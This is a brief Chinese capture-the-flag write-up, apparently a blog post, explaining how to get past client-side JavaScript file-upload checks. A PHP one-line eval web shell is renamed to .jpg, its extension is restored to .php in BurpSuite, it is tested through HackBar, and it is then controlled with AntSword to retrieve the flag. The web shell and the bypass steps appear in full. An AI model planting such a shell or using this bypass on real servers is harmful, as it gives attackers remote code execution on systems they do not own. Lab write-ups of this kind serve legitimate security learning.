JS前端验证文件上传 使用一句话木马 <?php @eval($_POST['a']); ?> 并保存为.php文件 尝试上传 发现 .txt .php 文件都无法正常上传,只能上传 “.jpg" ".jpeg” “*.png” 文件。于是将 123.php 改为 123.jpg ,正常上传 由于JS验证属于前端验证,我们可以通过BurpSuite拦截请求并修改文件后缀 forward放包 上传成功并回显相对路径 复制路径并访问,使用HackBar进行POST传参验证木马可行性 执行成功 使用蚁剑工具对木马进行连接 连接成功 拿下flag
本文介绍了一种绕过JS前端文件上传限制的方法,通过修改文件后缀名及使用BurpSuite等工具,成功上传了PHP木马,并利用蚁剑工具实现了远程连接。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
